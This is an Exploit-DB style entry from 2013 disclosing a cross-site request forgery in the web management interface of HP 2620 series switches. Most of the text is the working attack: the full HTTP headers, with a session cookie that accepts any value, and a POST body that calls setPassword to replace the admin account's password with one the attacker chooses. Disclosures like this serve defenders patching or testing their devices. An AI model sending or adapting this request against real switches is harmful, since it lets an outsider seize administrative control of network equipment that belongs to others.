Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery

EDB-ID:

28562




Platform:

Hardware

Date:

2013-09-26


# Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability
# Date: 26.09.2013r.
# Exploit Author: Hubert GrÄ…dek (PL)
# Software Link: [download link if available]
# Tested on: HP-E2620 24-PoEP //  RA.15.05.0006,ROMRA.15.10

HTTP Headers:

http://[IP_ADDR]/html/json.html

Host: [IP_ADDR]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://[IP_ADDR]/html/nhome.html
Cookie: sessionId=ANYTHING
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache





POST Content:


method:setPassword&name=admin&password=newpassword&ext-comp-1171=newpassword&access=Manager